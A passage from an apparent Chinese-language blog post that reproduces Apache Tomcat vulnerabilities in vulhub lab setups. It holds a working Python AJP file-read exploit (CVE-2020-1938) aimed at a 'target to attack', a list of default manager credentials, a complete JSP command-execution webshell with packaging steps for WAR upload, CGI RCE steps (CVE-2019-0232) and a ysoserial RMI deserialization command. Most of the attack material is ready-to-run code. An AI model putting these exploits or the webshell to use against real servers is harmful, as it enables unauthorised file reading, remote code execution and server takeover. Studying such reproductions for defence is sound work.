packets</span></span><br><span class="line">		<span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">			r = AjpResponse.receive(stream)</span><br><span class="line">			res.append(r)</span><br><span class="line">			<span class="keyword">if</span> r.prefix_code == AjpResponse.END_RESPONSE:</span><br><span class="line">				<span class="keyword">break</span></span><br><span class="line">			<span class="keyword">elif</span> r.prefix_code == AjpResponse.SEND_BODY_CHUNK:</span><br><span class="line">				<span class="keyword">continue</span></span><br><span class="line">			<span class="keyword">else</span>:</span><br><span class="line">				<span class="keyword">raise</span> NotImplementedError</span><br><span class="line">				<span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">		<span class="keyword">return</span> res</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">AjpResponse</span>(<span class="title class_ inherited__">object</span>):</span><br><span class="line">	_,_,_,SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = <span class="built_in">range</span>(<span class="number">7</span>)</span><br><span class="line">	COMMON_SEND_HEADERS = [</span><br><span class="line">			<span class="string">"Content-Type"</span>, <span class="string">"Content-Language"</span>, <span class="string">"Content-Length"</span>, <span class="string">"Date"</span>, <span class="string">"Last-Modified"</span>,</span><br><span class="line">			<span class="string">"Location"</span>, <span class="string">"Set-Cookie"</span>, <span class="string">"Set-Cookie2"</span>, <span class="string">"Servlet-Engine"</span>, <span class="string">"Status"</span>, <span class="string">"WWW-Authenticate"</span></span><br><span class="line">			]</span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">parse</span>(<span class="params">self, stream</span>):</span><br><span class="line">		<span class="comment"># read headers</span></span><br><span class="line">		self.magic, self.data_length, self.prefix_code = unpack(stream, <span class="string">"&gt;HHb"</span>)</span><br><span class="line"></span><br><span class="line">		<span class="keyword">if</span> self.prefix_code == AjpResponse.SEND_HEADERS:</span><br><span class="line">			self.parse_send_headers(stream)</span><br><span class="line">		<span class="keyword">elif</span> self.prefix_code == AjpResponse.SEND_BODY_CHUNK:</span><br><span class="line">			self.parse_send_body_chunk(stream)</span><br><span class="line">		<span class="keyword">elif</span> self.prefix_code == AjpResponse.END_RESPONSE:</span><br><span class="line">			self.parse_end_response(stream)</span><br><span class="line">		<span class="keyword">elif</span> self.prefix_code == AjpResponse.GET_BODY_CHUNK:</span><br><span class="line">			self.parse_get_body_chunk(stream)</span><br><span class="line">		<span class="keyword">else</span>:</span><br><span class="line">			<span class="keyword">raise</span> NotImplementedError</span><br><span class="line"></span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">parse_send_headers</span>(<span class="params">self, stream</span>):</span><br><span class="line">		self.http_status_code, = unpack(stream, <span class="string">"&gt;H"</span>)</span><br><span class="line">		self.http_status_msg = unpack_string(stream)</span><br><span class="line">		self.num_headers, = unpack(stream, <span class="string">"&gt;H"</span>)</span><br><span class="line">		self.response_headers = {}</span><br><span class="line">		<span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(self.num_headers):</span><br><span class="line">			code, = unpack(stream, <span class="string">"&gt;H"</span>)</span><br><span class="line">			<span class="keyword">if</span> code &lt;= <span class="number">0xA000</span>: <span class="comment"># custom header</span></span><br><span class="line">				h_name, = unpack(stream, <span class="string">"%ds"</span> % code)</span><br><span class="line">				stream.read(<span class="number">1</span>) <span class="comment"># \0</span></span><br><span class="line">				h_value = unpack_string(stream)</span><br><span class="line">			<span class="keyword">else</span>:</span><br><span class="line">				h_name = AjpResponse.COMMON_SEND_HEADERS[code-<span class="number">0xA001</span>]</span><br><span class="line">				h_value = unpack_string(stream)</span><br><span class="line">			self.response_headers[h_name] = h_value</span><br><span class="line"></span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">parse_send_body_chunk</span>(<span class="params">self, stream</span>):</span><br><span class="line">		self.data_length, = unpack(stream, <span class="string">"&gt;H"</span>)</span><br><span class="line">		self.data = stream.read(self.data_length+<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">parse_end_response</span>(<span class="params">self, stream</span>):</span><br><span class="line">		self.reuse, = unpack(stream, <span class="string">"b"</span>)</span><br><span class="line"></span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">parse_get_body_chunk</span>(<span class="params">self, stream</span>):</span><br><span class="line">		rlen, = unpack(stream, <span class="string">"&gt;H"</span>)</span><br><span class="line">		<span class="keyword">return</span> rlen</span><br><span class="line"></span><br><span class="line"><span class="meta">	@staticmethod</span></span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">receive</span>(<span class="params">stream</span>):</span><br><span class="line">		r = AjpResponse()</span><br><span class="line">		r.parse(stream)</span><br><span class="line">		<span class="keyword">return</span> r</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">prepare_ajp_forward_request</span>(<span class="params">target_host, req_uri, method=AjpForwardRequest.GET</span>):</span><br><span class="line">	fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)</span><br><span class="line">	fr.method = method</span><br><span class="line">	fr.protocol = <span class="string">"HTTP/1.1"</span></span><br><span class="line">	fr.req_uri = req_uri</span><br><span class="line">	fr.remote_addr = target_host</span><br><span class="line">	fr.remote_host = <span class="literal">None</span></span><br><span class="line">	fr.server_name = target_host</span><br><span class="line">	fr.server_port = <span class="number">80</span></span><br><span class="line">	fr.request_headers = {</span><br><span class="line">		<span class="string">'SC_REQ_ACCEPT'</span>: <span class="string">'text/html'</span>,</span><br><span class="line">		<span class="string">'SC_REQ_CONNECTION'</span>: <span class="string">'keep-alive'</span>,</span><br><span class="line">		<span class="string">'SC_REQ_CONTENT_LENGTH'</span>: <span class="string">'0'</span>,</span><br><span class="line">		<span class="string">'SC_REQ_HOST'</span>: target_host,</span><br><span class="line">		<span class="string">'SC_REQ_USER_AGENT'</span>: <span class="string">'Mozilla'</span>,</span><br><span class="line">		<span class="string">'Accept-Encoding'</span>: <span class="string">'gzip, deflate, sdch'</span>,</span><br><span class="line">		<span class="string">'Accept-Language'</span>: <span class="string">'en-US,en;q=0.5'</span>,</span><br><span class="line">		<span class="string">'Upgrade-Insecure-Requests'</span>: <span class="string">'1'</span>,</span><br><span class="line">		<span class="string">'Cache-Control'</span>: <span class="string">'max-age=0'</span></span><br><span class="line">	}</span><br><span class="line">	fr.is_ssl = <span class="literal">False</span></span><br><span class="line">	fr.attributes = []</span><br><span class="line">	<span class="keyword">return</span> fr</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Tomcat</span>(<span class="title class_ inherited__">object</span>):</span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, target_host, target_port</span>):</span><br><span class="line">		self.target_host = target_host</span><br><span class="line">		self.target_port = target_port</span><br><span class="line"></span><br><span class="line">		self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">		self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, <span class="number">1</span>)</span><br><span class="line">		self.socket.connect((target_host, target_port))</span><br><span class="line">		self.stream = self.socket.makefile(<span class="string">"rb"</span>)</span><br><span class="line">		<span class="comment">#self.stream = self.socket.makefile("rb", bufsize=0)</span></span><br><span class="line"></span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">perform_request</span>(<span class="params">self, req_uri, headers={}, method=<span class="string">'GET'</span>, user=<span class="literal">None</span>, password=<span class="literal">None</span>, attributes=[]</span>):</span><br><span class="line">		self.req_uri = req_uri</span><br><span class="line">		self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, method=AjpForwardRequest.REQUEST_METHODS.get(method))</span><br><span class="line">		<span class="built_in">print</span>(<span class="string">"Getting resource at ajp13://%s:%d%s"</span> % (self.target_host, self.target_port, req_uri))</span><br><span class="line">		<span class="keyword">if</span> user <span class="keyword">is</span> <span class="keyword">not</span> <span class="literal">None</span> <span class="keyword">and</span> password <span class="keyword">is</span> <span class="keyword">not</span> <span class="literal">None</span>:</span><br><span class="line">			self.forward_request.request_headers[<span class="string">'SC_REQ_AUTHORIZATION'</span>] = <span class="string">"Basic "</span> + (<span class="string">"%s:%s"</span> % (user, password)).encode(<span class="string">'base64'</span>).replace(<span class="string">'\n'</span>, <span class="string">''</span>)</span><br><span class="line">		<span class="keyword">for</span> h <span class="keyword">in</span> headers:</span><br><span class="line">			self.forward_request.request_headers[h] = headers[h]</span><br><span class="line">		<span class="keyword">for</span> a <span class="keyword">in</span> attributes:</span><br><span class="line">			self.forward_request.attributes.append(a)</span><br><span class="line">		responses = self.forward_request.send_and_receive(self.socket, self.stream)</span><br><span class="line">		<span class="keyword">if</span> <span class="built_in">len</span>(responses) == <span class="number">0</span>:</span><br><span class="line">			<span class="keyword">return</span> <span class="literal">None</span>, <span class="literal">None</span></span><br><span class="line">		snd_hdrs_res = responses[<span class="number">0</span>]</span><br><span class="line">		data_res = responses[<span class="number">1</span>:-<span class="number">1</span>]</span><br><span class="line">		<span class="keyword">if</span> <span class="built_in">len</span>(data_res) == <span class="number">0</span>:</span><br><span class="line">			<span class="built_in">print</span>(<span class="string">"No data in response. Headers:%s\n"</span> % snd_hdrs_res.response_headers)</span><br><span class="line">		<span class="keyword">return</span> snd_hdrs_res, data_res</span><br><span class="line"></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">javax.servlet.include.request_uri</span></span><br><span class="line"><span class="string">javax.servlet.include.path_info</span></span><br><span class="line"><span class="string">javax.servlet.include.servlet_path</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> argparse</span><br><span class="line">parser = argparse.ArgumentParser()</span><br><span class="line">parser.add_argument(<span class="string">"target"</span>, <span class="built_in">type</span>=<span class="built_in">str</span>, <span class="built_in">help</span>=<span class="string">"Hostname or IP to attack"</span>)</span><br><span class="line">parser.add_argument(<span class="string">'-p'</span>, <span class="string">'--port'</span>, <span class="built_in">type</span>=<span class="built_in">int</span>, default=<span class="number">8009</span>, <span class="built_in">help</span>=<span class="string">"AJP port to attack (default is 8009)"</span>)</span><br><span class="line">parser.add_argument(<span class="string">"-f"</span>, <span class="string">'--file'</span>, <span class="built_in">type</span>=<span class="built_in">str</span>, default=<span class="string">'WEB-INF/web.xml'</span>, <span class="built_in">help</span>=<span class="string">"file path :(WEB-INF/web.xml)"</span>)</span><br><span class="line">args = parser.parse_args()</span><br><span class="line">t = Tomcat(args.target, args.port)</span><br><span class="line">_,data = t.perform_request(<span class="string">'/asdf'</span>,attributes=[</span><br><span class="line">    {<span class="string">'name'</span>:<span class="string">'req_attribute'</span>,<span class="string">'value'</span>:[<span class="string">'javax.servlet.include.request_uri'</span>,<span class="string">'/'</span>]},</span><br><span class="line">    {<span class="string">'name'</span>:<span class="string">'req_attribute'</span>,<span class="string">'value'</span>:[<span class="string">'javax.servlet.include.path_info'</span>,args.file]},</span><br><span class="line">    {<span class="string">'name'</span>:<span class="string">'req_attribute'</span>,<span class="string">'value'</span>:[<span class="string">'javax.servlet.include.servlet_path'</span>,<span class="string">'/'</span>]},</span><br><span class="line">    ])</span><br><span class="line"><span class="built_in">print</span>(<span class="string">'----------------------------'</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">""</span>.join([d.data.decode(<span class="string">"utf-8"</span>) <span class="keyword">for</span> d <span class="keyword">in</span> data]))</span><br></pre></td></tr></tbody></table></figure>


<h2 id="Tomcat弱口令-war远程部署"><a href="#Tomcat弱口令-war远程部署" class="headerlink" title="Tomcat弱口令&amp;war远程部署"></a>Tomcat弱口令&amp;war远程部署</h2><h3 id="漏洞介绍"><a href="#漏洞介绍" class="headerlink" title="漏洞介绍"></a>漏洞介绍</h3><p>在tomcat8环境下默认进入后台的密码为tomcat/tomcat，未修改造成未授权即可进入后台，或者管理员把密码设置成弱口令，使用工具对其进行穷举。得到密码后，也可以进行后台上传恶意代码控制服务器。<br><strong>影响范围</strong><br>Tomcat版本：7.0–&gt;8.0</p>
<p><strong>原理</strong><br>在tomcat8环境下默认进入后台的密码为tomcat/tomcat，未修改造成未授权即可进入后台。Tomcat后台提供war包部署功能，实现上传webshell。</p>
<h3 id="复现-1"><a href="#复现-1" class="headerlink" title="复现"></a>复现</h3><p>环境：vulhub/tomcat/tomcat<br><img src="/img/24-5-13/3.png"><br>抓包<br><img src="/img/24-5-13/4.png"><br>Authorization头base64解码<br><img src="/img/24-5-13/5.png"><br>用户名：密码  形式再base64编码<br>可用户名密码进行爆破(好像爆破一个用户就会被ban)<br>默认用户名和密码</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line">tomcat:tomcat</span><br><span class="line">both:tomcat</span><br><span class="line">role1:tomcat</span><br><span class="line">admin:</span><br><span class="line">admin:password</span><br><span class="line">admin:admin</span><br></pre></td></tr></tbody></table></figure>
<p>使用默认tomcat:tomcat登录<br><img src="/img/24-5-13/6.png"></p>
<p>编写webshell</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">"java.util.*,java.io.*"</span>%&gt;</span><br><span class="line">&lt;HTML&gt;&lt;BODY&gt;</span><br><span class="line">&lt;FORM METHOD=<span class="string">"GET"</span> NAME=<span class="string">"myform"</span> ACTION=<span class="string">""</span>&gt;</span><br><span class="line">&lt;INPUT TYPE=<span class="string">"text"</span> NAME=<span class="string">"cmd"</span>&gt;</span><br><span class="line">&lt;INPUT TYPE=<span class="string">"submit"</span> VALUE=<span class="string">"Send"</span>&gt;</span><br><span class="line">&lt;/FORM&gt;</span><br><span class="line">&lt;pre&gt;</span><br><span class="line">&lt;%</span><br><span class="line"><span class="keyword">if</span> (request.getParameter(<span class="string">"cmd"</span>) != null) {</span><br><span class="line">        out.println(<span class="string">"Command: "</span> + request.getParameter(<span class="string">"cmd"</span>) + <span class="string">"&lt;BR&gt;"</span>);</span><br><span class="line">        Process p = Runtime.getRuntime().<span class="built_in">exec</span>(request.getParameter(<span class="string">"cmd"</span>));</span><br><span class="line">        OutputStream os = p.getOutputStream();</span><br><span class="line">        InputStream <span class="keyword">in</span> = p.getInputStream();</span><br><span class="line">        DataInputStream dis = new DataInputStream(<span class="keyword">in</span>);</span><br><span class="line">        String disr = dis.readLine();</span><br><span class="line">        <span class="keyword">while</span> ( disr != null ) {</span><br><span class="line">                out.println(disr); </span><br><span class="line">                disr = dis.readLine(); </span><br><span class="line">                }</span><br><span class="line">        }</span><br><span class="line">%&gt;</span><br><span class="line">&lt;/pre&gt;</span><br><span class="line">&lt;/BODY&gt;&lt;/HTML&gt;</span><br><span class="line"> </span><br><span class="line"> </span><br></pre></td></tr></tbody></table></figure>
<p>打成war包</p>
<figure class="highlight powershell"><table><tbody><tr><td class="code"><pre><span class="line">jar <span class="literal">-cvf</span> test.war .</span><br></pre></td></tr></tbody></table></figure>
<img src="/img/24-5-13/7.png">
部署成功
访问/test/shell.jsp
<img src="/img/24-5-13/8.png">

<h2 id="RCE-CVE-2019-0232"><a href="#RCE-CVE-2019-0232" class="headerlink" title="RCE (CVE-2019-0232)"></a>RCE (CVE-2019-0232)</h2><h3 id="漏洞描述-1"><a href="#漏洞描述-1" class="headerlink" title="漏洞描述"></a>漏洞描述</h3><p>(感觉条件苛刻，利用鸡肋)<br>由于JRE将命令行参数传递给Windows的方式存在错误，会导致CGI Servlet受到远程执行代码的攻击。<br>触发该漏洞需要同时满足以下条件：</p>
<ol>
<li>系统为Windows </li>
<li>启用了CGI Servlet（默认为关闭） </li>
<li>启用了enableCmdLineArguments（Tomcat 9.0.*及官方未来发布版本默认为关闭）</li>
</ol>
<p><strong>影响范围</strong><br>Apache Tomcat 9.0.0.M1 to 9.0.17<br>Apache Tomcat 8.5.0 to 8.5.39<br>Apache Tomcat 7.0.0 to 7.0.93</p>
<h3 id="复现-2"><a href="#复现-2" class="headerlink" title="复现"></a>复现</h3><p>首先进行CGI相关的配置，在 conf/web.xml 中启用CGIServlet：</p>
<figure class="highlight xml"><table><tbody><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">servlet</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">servlet-name</span>&gt;</span>cgi<span class="tag">&lt;/<span class="name">servlet-name</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">servlet-class</span>&gt;</span>org.apache.catalina.servlets.CGIServlet<span class="tag">&lt;/<span class="name">servlet-class</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">init-param</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">param-name</span>&gt;</span>cgiPathPrefix<span class="tag">&lt;/<span class="name">param-name</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">param-value</span>&gt;</span>WEB-INF/cgi-bin<span class="tag">&lt;/<span class="name">param-value</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">init-param</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">init-param</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">param-name</span>&gt;</span>enableCmdLineArguments<span class="tag">&lt;/<span class="name">param-name</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">param-value</span>&gt;</span>true<span class="tag">&lt;/<span class="name">param-value</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">init-param</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">init-param</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">param-name</span>&gt;</span>executable<span class="tag">&lt;/<span class="name">param-name</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">param-value</span>&gt;</span><span class="tag">&lt;/<span class="name">param-value</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">init-param</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">load-on-startup</span>&gt;</span>5<span class="tag">&lt;/<span class="name">load-on-startup</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">servlet</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<p>就将原来的注释去掉，在添加属性<br>这里主要的设置是 enableCmdLineArguments 和 executable 两个选项。 enableCmdLineArguments 启用后才会将Url中的参数传递到命令行， executable 指定了执行的二进制文件，默认是 perl，需要置为空才会执行文件本身。</p>
<p>同样在 conf/web.xml 中启用cgi的servlet-mapping</p>
<figure class="highlight xml"><table><tbody><tr><td class="code"><pre><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">servlet-mapping</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">servlet-name</span>&gt;</span>cgi<span class="tag">&lt;/<span class="name">servlet-name</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">url-pattern</span>&gt;</span>/cgi-bin/*<span class="tag">&lt;/<span class="name">url-pattern</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">servlet-mapping</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<p>之后修改 conf/context.xml 的 <context> 添加 privileged=”true”属性，否则会没有权限</context></p>
<figure class="highlight xml"><table><tbody><tr><td class="code"><pre><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">Context</span> <span class="attr">privileged</span>=<span class="string">"true"</span>&gt;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">&lt;!-- Default set of monitored resources. If one of these changes, the    --&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- web application will be reloaded.                                   --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">WatchedResource</span>&gt;</span>WEB-INF/web.xml<span class="tag">&lt;/<span class="name">WatchedResource</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">WatchedResource</span>&gt;</span>WEB-INF/tomcat-web.xml<span class="tag">&lt;/<span class="name">WatchedResource</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">WatchedResource</span>&gt;</span>${catalina.base}/conf/web.xml<span class="tag">&lt;/<span class="name">WatchedResource</span>&gt;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">&lt;!-- Uncomment this to disable session persistence across Tomcat restarts --&gt;</span></span><br><span class="line">    <span class="comment">&lt;!--</span></span><br><span class="line"><span class="comment">    &lt;Manager pathname="" /&gt;</span></span><br><span class="line"><span class="comment">    --&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">Context</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<p>然后在 ROOT\WEB-INF 下创建 cgi-bin 目录, 并在该目录下创建一个内容为 echo Content-type: text/html 的 e.bat 文件。</p>
<p>配置完成后，启动tomcat，访问 <a target="_blank" rel="noopener" href="http://127.0.0.1:8080/cgi-bin/e.bat?&amp;ver">http://127.0.0.1:8080/cgi-bin/e.bat?&amp;ver</a> ，可以看到命令执行成功。</p>
<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/4875">https://xz.aliyun.com/t/4875?</a></p>
<h2 id="Tomcat-反序列化漏洞-CVE-2016-8735"><a href="#Tomcat-反序列化漏洞-CVE-2016-8735" class="headerlink" title="Tomcat 反序列化漏洞 (CVE-2016-8735)"></a>Tomcat 反序列化漏洞 (CVE-2016-8735)</h2><h3 id="漏洞描述-2"><a href="#漏洞描述-2" class="headerlink" title="漏洞描述"></a>漏洞描述</h3><p>之前Oracle发布的mxRemoteLifecycleListener反序列化漏洞（CVE-2016-3427）相关，是由于使用了JmxRemoteLifecycleListener的监听功能所导致。而在Oracle官方发布修复后，Tomcat未能及时修复更新而导致的远程代码执行。 该漏洞所造成的最根本原因是Tomcat在配置JMX做监控时使用了JmxRemoteLifecycleListener的方法。</p>
<p><strong>条件</strong><br>外部需要开启JmxRemoteLifecycleListener监听的10001和10002端口，来实现远程代码执行。</p>
<figure class="highlight xml"><table><tbody><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">Listener</span> <span class="attr">className</span>=<span class="string">"org.apache.catalina.mbeans.JmxRemoteLifecycleListener"</span> <span class="attr">rmiRegistryPortPlatform</span>=<span class="string">"10001"</span> <span class="attr">rmiServerPortPlatform</span>=<span class="string">"10002"</span> /&gt;</span></span><br></pre></td></tr></tbody></table></figure>


<p><strong>影响版本</strong><br>Apache Tomcat 9.0.0.M1 to 9.0.0.M11<br>Apache Tomcat 8.5.0 to 8.5.6<br>Apache Tomcat 8.0.0.RC1 to 8.0.38<br>Apache Tomcat 7.0.0 to 7.0.72<br>Apache Tomcat 6.0.0 to 6.0.47</p>
<p>打RMI:</p>
<figure class="highlight shell"><table><tbody><tr><td class="code"><pre><span class="line">java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 192.168.0.167 10001 Groovy1 "calc.exe"</span><br></pre></td></tr></tbody></table></figure>
<p>需要Groovy相关依赖<br>（暂无找到分析文章）</p>
<h2 id="样例目录session操控漏洞"><a href="#样例目录session操控漏洞" class="headerlink" title="样例目录session操控漏洞"></a>样例目录session操控漏洞</h2><p>同一个tomcat下面，两个项目之间ession不能共享。所以”Apache Tomcat示例目录漏洞”对其他项目的威胁不大，但仍建议在部署环境中删除tomcat示例。<br>按照Servlet规范，session的作用范围应该仅仅限于当前应用程序下，不同的应用程序之间是不能够相互访问对方的session的。各个应用服务器从实际效果上都遵守了这一规范，但实现细节却可能不同，因此解决跨应用程序session共享的方法也各不相同。<br>在examples目录下创建一个jsp登录管理的页面，即可实现对session的操控。<br><a target="_blank" rel="noopener" href="http://47.104.218.243:8080/login/login.jsp">http://47.104.218.243:8080/login/login.jsp</a></p>
<h3 id="检测链接"><a href="#检测链接" class="headerlink" title="检测链接"></a>检测链接</h3><p><a target="_blank" rel="noopener" href="http://localhost:8080/examples/servlets/servlet/SessionExample">http://localhost:8080/examples/servlets/servlet/SessionExample</a><br>在Name of Session Attribute: 里输入login<br>在Value of Session Attribute:里输入admin</p>
<p>提交后显示login=admin已经写入session</p>
<p>然后就可以访问<br><a target="_blank" rel="noopener" href="http://localhost:8080/examples/index.jsp">http://localhost:8080/examples/index.jsp</a></p>
<h2 id="其他漏洞集合"><a href="#其他漏洞集合" class="headerlink" title="其他漏洞集合"></a>其他漏洞集合</h2><p><strong>Tomcat本地提权漏洞(CVE-2016-1240)，Tomcat本地提权漏洞分析与防御。</strong><br>Apache Tomcat 拒绝服务漏洞CVE-2014-0230<br>Apache Tomcat Manager和Host Manager应用程序安全漏洞(CVE-2015-5351)<br>Apache Tomcat session-persistence 远程代码执行漏洞(CVE-2016-0714)<br>Apache Tomcat 会话固定漏洞(CVE-2015-5346)<br>Apache Tomcat 远程代码执行漏洞(CVE-2016-8735)<br>Apache Tomcat Commons Fileupload 拒绝服务漏洞(CVE-2016-3092)<br>Apache Tomcat httpoxy 安全漏洞(CVE-2016-5388)<br>Apache Tomcat 安全绕过漏洞(CVE-2016-6816)<br>Apache Tomcat AJP协议安全绕过漏洞<br>Apache Tomcat 安全绕过漏洞(CVE-2012-3439)<br>Tomcat 拒绝服务漏洞(CVE-2014-0050)<br>Apache Tomcat 安全漏洞(CVE-2017-6056)<br>Apache Tomcat 安全漏洞(CVE-2017-5648)<br>Apache Tomcat Default Servlet 安全漏洞(CVE-2017-5664)<br>Tomcat 信息泄露漏洞(CVE-2017-12616)<br>Apache Tomcat 安全漏洞(CVE-2017-12617)<br>Apache Tomcat 安全漏洞(CVE-2017-5647)<br>Apache Tomcat 安全漏洞(CVE-2018-1304)<br>Apache Tomcat 安全漏洞(CVE-2018-1305)</p>

      
    </div>
    <footer class="article-footer">
      
      
      
      
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/Tomcat/" rel="tag">Tomcat</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/web%E4%B8%AD%E9%97%B4%E4%BB%B6/" rel="tag">web中间件</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag">漏洞复现</a></li></ul>


    </footer>
  </div>
  
    
  <nav id="article-nav" data-aos="fade-up">
    
      <div class="article-nav-link-wrap article-nav-link-left">
        
          
          
            <img data-src="https://blog.yyjccc.xyz/images/cover/2.jpg" data-sizes="auto" alt="幽默的Commons-Collections6调试" class="lazyload">
          
        
        <a href="/2024/05/14/%E5%B9%BD%E9%BB%98%E7%9A%84Commons-Collections6%E8%B0%83%E8%AF%95/"></a>
        <div class="article-nav-caption">前一篇</div>
        <h3 class="article-nav-title">
          
            幽默的Commons-Collections6调试
          
        </h3>
      </div>
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        
        
          <img data-src="https://d-sketon.top/img/_backwebp/bg28.webp" data-sizes="auto" alt="shiro550" class="lazyload">
        
      
      <a href="/2024/05/06/shiro550-md-yyj/"></a>
      <div class="article-nav-caption">后一篇</div>
      <h3 class="article-nav-title">
        
          shiro550
        
      </h3>
    </div>
    
  </nav>


  
</article>




  <div id="comments" class="gtcomment"></div>



</section>
          
            <aside id="sidebar">
  <div class="sidebar-wrapper wrap-sticky">
    <div class="sidebar-wrap" data-aos="fade-up">
      
        <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Tomcat-%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E9%9B%86%E5%90%88"><span class="toc-number">1.</span> <span class="toc-text">Tomcat 漏洞复现集合</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Tomcat-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%85%A5%EF%BC%88CVE-2017-12615"><span class="toc-number">1.1.</span> <span class="toc-text">Tomcat 任意文件写入（CVE-2017-12615</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AE%80%E4%BB%8B"><span class="toc-number">1.1.1.</span> <span class="toc-text">简介</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%8D%E7%8E%B0"><span class="toc-number">1.1.2.</span> <span class="toc-text">复现</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96-%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2020-1938%EF%BC%89"><span class="toc-number">1.2.</span> <span class="toc-text">文件读取&#x2F;包含漏洞（CVE-2020-1938）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0"><span class="toc-number">1.2.1.</span> <span class="toc-text">漏洞描述</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9D%A1%E4%BB%B6"><span class="toc-number">1.2.2.</span> <span class="toc-text">条件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#poc"><span class="toc-number">1.2.3.</span> <span class="toc-text">poc</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Tomcat%E5%BC%B1%E5%8F%A3%E4%BB%A4-war%E8%BF%9C%E7%A8%8B%E9%83%A8%E7%BD%B2"><span class="toc-number">1.3.</span> <span class="toc-text">Tomcat弱口令&amp;war远程部署</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D"><span 